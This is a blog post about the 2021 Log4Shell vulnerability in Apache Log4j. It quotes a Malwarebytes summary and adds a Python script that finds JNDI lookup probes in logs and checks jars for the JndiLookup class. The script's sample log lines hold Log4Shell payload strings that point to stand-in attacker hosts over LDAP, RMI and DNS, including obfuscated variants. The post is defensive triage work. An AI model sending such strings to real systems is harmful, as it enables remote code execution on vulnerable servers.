Severe Flaw In Java Library Sends Sysadmins Scrambling To Patch Everything

A new, actively exploited vulnerability in the Apache Log4j logging library has been disclosed, and sysadmins around the world are scrambling to patch all the things. MalwareBytes has a very good description of it here; here are the highlights:

If you’re running a service that relies on Apache Struts or uses the popular Apache Log4j utility we hope you haven’t made plans for the weekend.

An exploit listed as CVE-2021-44228 was made public on December 9, 2021. The exploit is simple, easy to trigger, and can be used to perform remote code execution (RCE) in vulnerable systems, which could allow an attacker to gain full control of them. All an attacker has to do is get the affected app to log a special string. For that reason, researchers have dubbed the vulnerability “Log4Shell”.

The vulnerability has a CVSS score of 10.0 out of a possible 10. It impacts Apache Log4j versions 2.0-beta9 to 2.14.1. Mitigations are available for version 2.10 and higher.

Log4j is an open source logging library written in Java that was developed by the Apache Software Foundation. Millions of applications use it, and some of them are enormously popular—such as iCloud, Steam, and Minecraft—so the potential reach of this problem is enormous.
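The mechanism in the quoted summary above (an attacker gets the application to log a string that Log4j resolves as a JNDI lookup) is also what makes the attack easy to hunt for after the fact. The following is an added example, not code from the original post or from Malwarebytes: it normalizes the common obfuscations attackers use to hide the `${jndi:` marker (URL encoding, `${lower:…}`/`${upper:…}` lookups, and the `${…:-x}` default-value form) and flags matching lines, then checks whether a jar still carries the `JndiLookup.class` that the widely published stop-gap removes from `log4j-core`. The log lines, the `attacker.example` hosts, and the stand-in jar are all constructed for the example; the normalizer covers only the obfuscations listed, not every nesting Log4j can resolve.

```python
import io
import re
import zipfile
from urllib.parse import unquote

# Constructed sample log lines (not real traffic): one benign request, a plain
# probe, and three obfuscated variants of the kind reported in the wild.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:12 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:10:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
]

# Substitutions Log4j resolves before the jndi lookup runs; attackers nest them
# so that a naive search for "${jndi:" in the raw line misses the payload:
#   ${lower:J} / ${upper:j}   -> "j"
#   ${env:NOPE:-j} / ${::-j}  -> "j"   (the ":-" default-value form)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI_MARKER = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and the innermost lookup substitutions until stable."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)
        text = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line, once de-obfuscated, contains a jndi lookup."""
    return _JNDI_MARKER.search(normalize(line)) is not None


def scan_log(lines):
    """Return (index, normalized line) for every line carrying a jndi lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines)
            if is_log4shell_probe(line)]


# The class Log4j 2.x uses to perform JNDI lookups. Removing it from
# log4j-core is the published stop-gap for deployments that cannot upgrade.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def jar_has_jndi_lookup(jar_bytes: bytes) -> bool:
    """True if the jar still ships the JndiLookup class."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        return JNDI_LOOKUP_CLASS in jar.namelist()


def build_sample_jar(with_jndi_lookup: bool) -> bytes:
    """Constructed stand-in for log4j-core; only the entry names matter here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"")
        if with_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")
    return buf.getvalue()


if __name__ == "__main__":
    for index, decoded in scan_log(SAMPLE_LOG_LINES):
        print(f"line {index}: {decoded}")
    print("sample jar still has JndiLookup:",
          jar_has_jndi_lookup(build_sample_jar(True)))
```

Run over real access or application logs, `scan_log` is a triage aid, not proof of compromise: a flagged line shows a probe was logged, and whether it fired depends on the Log4j version and configuration that handled it. For real jars, open them with `zipfile.ZipFile(path)` in place of the in-memory stand-in; a hit on a `log4j-core` in the affected range is a host to upgrade first.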

I can say that many companies are scrambling to patch the vulnerability via asking my friends “off the record”. I have to assume that it includes Steam and Apple as they are specifically called out as being vulnerable. That’s because it is being actively exploited. That makes this as non-trivial as “non-trivial” gets.

Yikes!

One Response to “Severe Flaw In Java Library Sends Sysadmins Scrambling To Patch Everything”

  1. […] of the rather catastrophic Log4j vulnerability that sent the planet scrambling to patch all the things last week before they were exploited by bad […]
